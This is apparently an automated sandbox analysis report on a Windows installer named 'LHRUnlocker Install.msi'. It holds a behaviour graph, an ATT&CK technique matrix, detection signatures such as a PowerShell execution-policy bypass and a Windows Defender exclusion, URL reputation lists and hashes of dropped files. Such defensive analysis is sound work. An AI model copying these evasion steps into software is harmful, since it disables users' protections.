Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
1
Replication Through Removable Media
1
Command and Scripting Interpreter
1
DLL Side-Loading
11
Process Injection
21
Masquerading
OS Credential Dumping1
Security Software Discovery
1
Replication Through Removable Media
1
Archive Collected Data
Exfiltration Over Other Network Medium1
Encrypted Channel
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts1
PowerShell
Boot or Logon Initialization Scripts1
DLL Side-Loading
1
Disable or Modify Tools
LSASS Memory1
Process Discovery
Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)21
Virtualization/Sandbox Evasion
Security Account Manager21
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
Process Injection
NTDS1
Application Window Discovery
Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information
LSA Secrets11
Peripheral Device Discovery
SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.common1
DLL Side-Loading
Cached Domain Credentials1
File and Directory Discovery
VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup Items1
File Deletion
DCSync12
System Information Discovery
Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 577501 Sample: LHRUnlocker Install.msi Startdate: 23/02/2022 Architecture: WINDOWS Score: 45 46 Sigma detected: Powershell Defender Exclusion 2->46 48 Sigma detected: Change PowerShell Policies to a Unsecure Level 2->48 50 Sigma detected: Suspicious Script Execution From Temp Folder 2->50 8 msiexec.exe 3 8 2->8         started        11 msiexec.exe 12 2->11         started        process3 file4 26 C:\Windows\Installer\MSI3268.tmp, PE32 8->26 dropped 28 C:\Windows\Installer\MSI2874.tmp, PE32 8->28 dropped 30 C:\Windows\Installer\MSI1FD8.tmp, PE32 8->30 dropped 13 msiexec.exe 8 8->13         started        16 msiexec.exe 8->16         started        32 C:\Users\user\AppData\Local\...\MSIF832.tmp, PE32 11->32 dropped 34 C:\Users\user\AppData\Local\...\MSIF69B.tmp, PE32 11->34 dropped 36 C:\Users\user\AppData\Local\...\MSIF513.tmp, PE32 11->36 dropped 38 4 other files (none is malicious) 11->38 dropped process5 file6 40 C:\Users\user\AppData\Local\...\scr3351.ps1, Little-endian 13->40 dropped 42 C:\Users\user\AppData\Local\...\pss341F.ps1, Little-endian 13->42 dropped 19 powershell.exe 19 13->19         started        44 Bypasses PowerShell execution policy 16->44 signatures7 process8 signatures9 52 Adds a directory exclusion to Windows Defender 19->52 22 powershell.exe 1 19->22         started        24 conhost.exe 19->24         started        process10

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
LHRUnlocker Install.msi0%VirustotalBrowse
LHRUnlocker Install.msi0%MetadefenderBrowse
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\MSIEF62.tmp0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\MSIEF62.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\MSIF280.tmp0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\MSIF280.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\MSIF34C.tmp0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\MSIF34C.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\MSIF447.tmp0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\MSIF447.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\MSIF513.tmp0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\MSIF513.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\MSIF69B.tmp0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\MSIF69B.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\MSIF832.tmp0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\MSIF832.tmp0%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://pesterbdd.com/images/Pester.png00%Avira URL Cloudsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://drivers.sergeydev.com/windows/511.65-desktop-win64bit-interr0%Avira URL Cloudsafe
https://go.micro0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
https://t.me/LHRUnlockerMSIFASTINSTALLAI_CURRENT_YEAR2022ButtonText_Decline&DeclineAI_PREDEF_LCONDS_3c1a5a.msi.1.drfalse
    high
    http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.574716959.0000000005DB6000.00000004.00000800.00020000.00000000.sdmpfalse
      high
      http://pesterbdd.com/images/Pester.png0powershell.exe, 00000008.00000002.569890289.0000000004E93000.00000004.00000800.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://github.com/Pester/Pester0powershell.exe, 00000008.00000002.569890289.0000000004E93000.00000004.00000800.00020000.00000000.sdmpfalse
        high
        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.569890289.0000000004E93000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://www.thawte.com/cps0/LHRUnlocker Install.msi, MSI2874.tmp.1.dr, 3c1a5a.msi.1.dr, MSIF447.tmp.0.dr, MSIF513.tmp.0.dr, MSIF280.tmp.0.dr, MSIEF62.tmp.0.dr, MSI1FD8.tmp.1.dr, MSIF34C.tmp.0.dr, MSIF69B.tmp.0.dr, MSI3268.tmp.1.dr, MSIF832.tmp.0.drfalse
          high
          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000014.00000002.569907486.0000000005463000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.569890289.0000000004E93000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              https://drivers.sergeydev.com/windows/511.65-desktop-win64bit-interrLHRUnlocker Install.msi, 3c1a5a.msi.1.drfalse
              • Avira URL Cloud: safe
              unknown
              https://go.micropowershell.exe, 00000008.00000003.527476361.00000000057BD000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://www.thawte.com/repository0WLHRUnlocker Install.msi, MSI2874.tmp.1.dr, 3c1a5a.msi.1.dr, MSIF447.tmp.0.dr, MSIF513.tmp.0.dr, MSIF280.tmp.0.dr, MSIEF62.tmp.0.dr, MSI1FD8.tmp.1.dr, MSIF34C.tmp.0.dr, MSIF69B.tmp.0.dr, MSI3268.tmp.1.dr, MSIF832.tmp.0.drfalse
                high
                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000014.00000002.569907486.0000000005463000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://contoso.com/powershell.exe, 00000008.00000002.574716959.0000000005DB6000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.574716959.0000000005DB6000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://t.me/LHRUnlockerChannelButtonText_Finish&FinishManufacturerSergeyProductCode3c1a5a.msi.1.drfalse
                      high
                      https://contoso.com/Licensepowershell.exe, 00000008.00000002.574716959.0000000005DB6000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://contoso.com/Iconpowershell.exe, 00000008.00000002.574716959.0000000005DB6000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://www.advancedinstaller.comLHRUnlocker Install.msi, MSI2874.tmp.1.dr, 3c1a5a.msi.1.dr, MSIF447.tmp.0.dr, MSIF513.tmp.0.dr, MSIF280.tmp.0.dr, MSIEF62.tmp.0.dr, MSI1FD8.tmp.1.dr, MSIF34C.tmp.0.dr, MSIF69B.tmp.0.dr, MSI3268.tmp.1.dr, MSIF832.tmp.0.drfalse
                        high
                        http://www.winimage.com/zLibDllLHRUnlocker Install.msi, 3c1a5a.msi.1.drfalse
                          high
                          http://www.apache.org/licenses/LICENSE-2.0.html0powershell.exe, 00000008.00000002.569890289.0000000004E93000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000008.00000002.569706056.0000000004D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.569503503.0000000005321000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.winimage.com/zLibDll1.2.7rbrLHRUnlocker Install.msi, 3c1a5a.msi.1.drfalse
                                high
                                https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.569890289.0000000004E93000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  No contacted IP infos
                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                  Analysis ID:577501
                                  Start date:23.02.2022
                                  Start time:18:48:22
                                  Joe Sandbox Product:CloudBasic
                                  Overall analysis duration:0h 9m 19s
                                  Hypervisor based Inspection enabled:false
                                  Report type:light
                                  Sample file name:LHRUnlocker Install.msi
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                  Number of analysed new started processes analysed:22
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Detection:MAL
                                  Classification:mal45.evad.winMSI@11/20@0/0
                                  EGA Information:
                                  • Successful, ratio: 50%
                                  HDC Information:Failed
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 0
                                  • Number of non-executed functions: 0
                                  Cookbook Comments:
                                  • Adjust boot time
                                  • Enable AMSI
                                  • Found application associated with file extension: .msi
                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                  • Excluded IPs from analysis (whitelisted): 23.211.6.115, 20.54.104.15
                                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net
                                  • Execution Graph export aborted for target powershell.exe, PID 7036 because it is empty
                                  • Not all processes where analyzed, report is missing behavior information
                                  TimeTypeDescription
                                  18:50:55API Interceptor7x Sleep call for process: powershell.exe modified
                                  No context
                                  No context
                                  No context
                                  No context
                                  No context
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):5829
                                  Entropy (8bit):4.8968676994158
                                  Encrypted:false
                                  SSDEEP:96:WCJ2Woe5o2k6Lm5emmXIGvgyg12jDs+un/iQLEYFjDaeWJ6KGcmXx9smyFRLcU6f:5xoe5oVsm5emd0gkjDt4iWN3yBGHh9s6
                                  MD5:36DE9155D6C265A1DE62A448F3B5B66E
                                  SHA1:02D21946CBDD01860A0DE38D7EEC6CDE3A964FC3
                                  SHA-256:8BA38D55AA8F1E4F959E7223FDF653ABB9BE5B8B5DE9D116604E1ABB371C1C87
                                  SHA-512:C734ADE161FB89472B1DF9B9F062F4A53E7010D3FF99EDC0BD564540A56BC35743625C50A00635C31D165A74DCDBB330FFB878C5919D7B267F6F33D2AAB328E7
                                  Malicious:false
                                  Reputation:moderate, very likely benign file
                                  Preview:PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                  Process:C:\Windows\System32\msiexec.exe
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):408544
                                  Entropy (8bit):6.410598211463919
                                  Encrypted:false
                                  SSDEEP:6144:FwznG9uw/r8fyHQMNvrPGtPu4AO9k9ZeWYhEIho7bZQ:SG9TAVMlSn30Z0EIhgbZQ
                                  MD5:5D25243E90673C44AC420D69676F9062
                                  SHA1:23234013562F7EF738DB615246D391B8E191B475
                                  SHA-256:0DDB820918F3918496E414617536226AF08E27A7F13E5A58444F8DCF297A65D5
                                  SHA-512:47BA474912D8530FC78FD2C61572A3C9E91A27B1BDFAB08869A550AE0452298B3FF63A06B607BECA9D8DF56BCCC19B9720F5E1EC59EA5F3FD0F85C9762058FB9
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........0..c..c..c"..b..c"..bV.c...b..c...b..c...b..c"..b..c"..b..c"..b..c..c..cH..b..cH..b..cH.Sc..c..;c..cH..b..cRich..c........PE..L...G..a.........."!.........&............... ...............................`............@.........................@...................0............"..........\B...S..p...................@U......HT..@............ ..$............................text............................... ..`.rdata....... ......................@..@.data...............................@....rsrc...0...........................@..@.reloc..\B.......D..................@..B........................................................................................................................................................................................................................................................................................
                                  Process:C:\Windows\System32\msiexec.exe
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):408544
                                  Entropy (8bit):6.410598211463919
                                  Encrypted:false
                                  SSDEEP:6144:FwznG9uw/r8fyHQMNvrPGtPu4AO9k9ZeWYhEIho7bZQ:SG9TAVMlSn30Z0EIhgbZQ
                                  MD5:5D25243E90673C44AC420D69676F9062
                                  SHA1:23234013562F7EF738DB615246D391B8E191B475
                                  SHA-256:0DDB820918F3918496E414617536226AF08E27A7F13E5A58444F8DCF297A65D5
                                  SHA-512:47BA474912D8530FC78FD2C61572A3C9E91A27B1BDFAB08869A550AE0452298B3FF63A06B607BECA9D8DF56BCCC19B9720F5E1EC59EA5F3FD0F85C9762058FB9
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........0..c..c..c"..b..c"..bV.c...b..c...b..c...b..c"..b..c"..b..c"..b..c..c..cH..b..cH..b..cH.Sc..c..;c..cH..b..cRich..c........PE..L...G..a.........."!.........&............... ...............................`............@.........................@...................0............"..........\B...S..p...................@U......HT..@............ ..$............................text............................... ..`.rdata....... ......................@..@.data...............................@....rsrc...0...........................@..@.reloc..\B.......D..................@..B........................................................................................................................................................................................................................................................................................
                                  Process:C:\Windows\System32\msiexec.exe
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):408544
                                  Entropy (8bit):6.410598211463919
                                  Encrypted:false
                                  SSDEEP:6144:FwznG9uw/r8fyHQMNvrPGtPu4AO9k9ZeWYhEIho7bZQ:SG9TAVMlSn30Z0EIhgbZQ
                                  MD5:5D25243E90673C44AC420D69676F9062
                                  SHA1:23234013562F7EF738DB615246D391B8E191B475
                                  SHA-256:0DDB820918F3918496E414617536226AF08E27A7F13E5A58444F8DCF297A65D5
                                  SHA-512:47BA474912D8530FC78FD2C61572A3C9E91A27B1BDFAB08869A550AE0452298B3FF63A06B607BECA9D8DF56BCCC19B9720F5E1EC59EA5F3FD0F85C9762058FB9
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........0..c..c..c"..b..c"..bV.c...b..c...b..c...b..c"..b..c"..b..c"..b..c..c..cH..b..cH..b..cH.Sc..c..;c..cH..b..cRich..c........PE..L...G..a.........."!.........&............... ...............................`............@.........................@...................0............"..........\B...S..p...................@U......HT..@............ ..$............................text............................... ..`.rdata....... ......................@..@.data...............................@....rsrc...0...........................@..@.reloc..\B.......D..................@..B........................................................................................................................................................................................................................................................................................
                                  Process:C:\Windows\System32\msiexec.exe
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):408544
                                  Entropy (8bit):6.410598211463919
                                  Encrypted:false
                                  SSDEEP:6144:FwznG9uw/r8fyHQMNvrPGtPu4AO9k9ZeWYhEIho7bZQ:SG9TAVMlSn30Z0EIhgbZQ
                                  MD5:5D25243E90673C44AC420D69676F9062
                                  SHA1:23234013562F7EF738DB615246D391B8E191B475
                                  SHA-256:0DDB820918F3918496E414617536226AF08E27A7F13E5A58444F8DCF297A65D5
                                  SHA-512:47BA474912D8530FC78FD2C61572A3C9E91A27B1BDFAB08869A550AE0452298B3FF63A06B607BECA9D8DF56BCCC19B9720F5E1EC59EA5F3FD0F85C9762058FB9
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........0..c..c..c"..b..c"..bV.c...b..c...b..c...b..c"..b..c"..b..c"..b..c..c..cH..b..cH..b..cH.Sc..c..;c..cH..b..cRich..c........PE..L...G..a.........."!.........&............... ...............................`............@.........................@...................0............"..........\B...S..p...................@U......HT..@............ ..$............................text............................... ..`.rdata....... ......................@..@.data...............................@....rsrc...0...........................@..@.reloc..\B.......D..................@..B........................................................................................................................................................................................................................................................................................
                                  Process:C:\Windows\System32\msiexec.exe
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):408544
                                  Entropy (8bit):6.410598211463919
                                  Encrypted:false
                                  SSDEEP:6144:FwznG9uw/r8fyHQMNvrPGtPu4AO9k9ZeWYhEIho7bZQ:SG9TAVMlSn30Z0EIhgbZQ
                                  MD5:5D25243E90673C44AC420D69676F9062
                                  SHA1:23234013562F7EF738DB615246D391B8E191B475
                                  SHA-256:0DDB820918F3918496E414617536226AF08E27A7F13E5A58444F8DCF297A65D5
                                  SHA-512:47BA474912D8530FC78FD2C61572A3C9E91A27B1BDFAB08869A550AE0452298B3FF63A06B607BECA9D8DF56BCCC19B9720F5E1EC59EA5F3FD0F85C9762058FB9
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........0..c..c..c"..b..c"..bV.c...b..c...b..c...b..c"..b..c"..b..c"..b..c..c..cH..b..cH..b..cH.Sc..c..;c..cH..b..cRich..c........PE..L...G..a.........."!.........&............... ...............................`............@.........................@...................0............"..........\B...S..p...................@U......HT..@............ ..$............................text............................... ..`.rdata....... ......................@..@.data...............................@....rsrc...0...........................@..@.reloc..\B.......D..................@..B........................................................................................................................................................................................................................................................................................
                                  Process:C:\Windows\System32\msiexec.exe
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):895968
                                  Entropy (8bit):6.449966561388975
                                  Encrypted:false
                                  SSDEEP:24576:fs3GWVtxNzxu3BBvF/BRROunzpGsOZ9d9lO1a:Kf7xuxBvF/BRROAUsOZ9d9lO1a
                                  MD5:22D986F98F87F5521ED2F3EDAA9374CA
                                  SHA1:9A1A233277E5A3A0A2565BFCAE593AF13B907EBF
                                  SHA-256:8E896FF52ED8FF11CC74907ECB2A5B9B9267289E54C956F9C9E07E8BA3A6D175
                                  SHA-512:69702074D8C9A5B33D948519A889F7671D374DDC2F2C3FAC8A4F0126E3C4A218077A015899AE54C7FA56E5198C57F4EFC55AD56227E9FFC02F3F412CFAFFAA5B
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X.Z...4P..4P..4P..7Q..4P..1Q..4PN.0Q..4PN.7Q..4PN.1QN.4P..0Q..4P..5Q..4P..5P1.4P..=Q,.4P..4Q..4P...P..4P...P..4P..6Q..4PRich..4P........................PE..L......a.........."!................%........0............................................@.............................t.......................................<...x...p..............................@............0...............................text............................... ..`.rdata..V....0......................@..@.data..............................@....rsrc...............................@..@.reloc..<...........................@..B................................................................................................................................................................................................................................................................................
                                  Process:C:\Windows\System32\msiexec.exe
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):408544
                                  Entropy (8bit):6.410598211463919
                                  Encrypted:false
                                  SSDEEP:6144:FwznG9uw/r8fyHQMNvrPGtPu4AO9k9ZeWYhEIho7bZQ:SG9TAVMlSn30Z0EIhgbZQ
                                  MD5:5D25243E90673C44AC420D69676F9062
                                  SHA1:23234013562F7EF738DB615246D391B8E191B475
                                  SHA-256:0DDB820918F3918496E414617536226AF08E27A7F13E5A58444F8DCF297A65D5
                                  SHA-512:47BA474912D8530FC78FD2C61572A3C9E91A27B1BDFAB08869A550AE0452298B3FF63A06B607BECA9D8DF56BCCC19B9720F5E1EC59EA5F3FD0F85C9762058FB9
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........0..c..c..c"..b..c"..bV.c...b..c...b..c...b..c"..b..c"..b..c"..b..c..c..cH..b..cH..b..cH.Sc..c..;c..cH..b..cRich..c........PE..L...G..a.........."!.........&............... ...............................`............@.........................@...................0............"..........\B...S..p...................@U......HT..@............ ..$............................text............................... ..`.rdata....... ......................@..@.data...............................@....rsrc...0...........................@..@.reloc..\B.......D..................@..B........................................................................................................................................................................................................................................................................................
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:very short file (no magic)
                                  Category:dropped
                                  Size (bytes):1
                                  Entropy (8bit):0.0
                                  Encrypted:false
                                  SSDEEP:3:U:U
                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
